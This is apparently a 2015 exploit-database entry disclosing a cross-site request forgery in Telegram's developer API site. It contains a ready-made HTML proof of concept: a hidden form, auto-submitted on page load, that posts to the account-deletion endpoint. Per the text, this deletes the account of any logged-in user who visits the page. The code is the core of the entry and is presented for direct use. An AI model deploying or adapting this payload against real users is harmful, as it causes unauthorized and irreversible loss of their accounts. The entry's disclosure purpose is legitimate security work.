/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
**
** Exploit Author: C4T
**
** Vendor Homepage : http://my.telegram.org
**
** Google Dork: none
**
** Date: 06/27/2015
**
** Tested on: Windows 7
**
************************************************************************************
** Exploit Code:
******************

<body onload="document.exploit.submit()">
<form name="exploit"
action="https://my.telegram.org/deactivate/do_delete"
id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>


*************************************************************************************
** Description:
******************

when a user is logging in telegram API just by openning a web page
containing this exploit his account will be deleted.


Discovered by C4T
@ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
**
** More Details and Explanation:
**
** http://hatrhyme.com/CSRFInTelegram.pdf
**
******************************************************************************************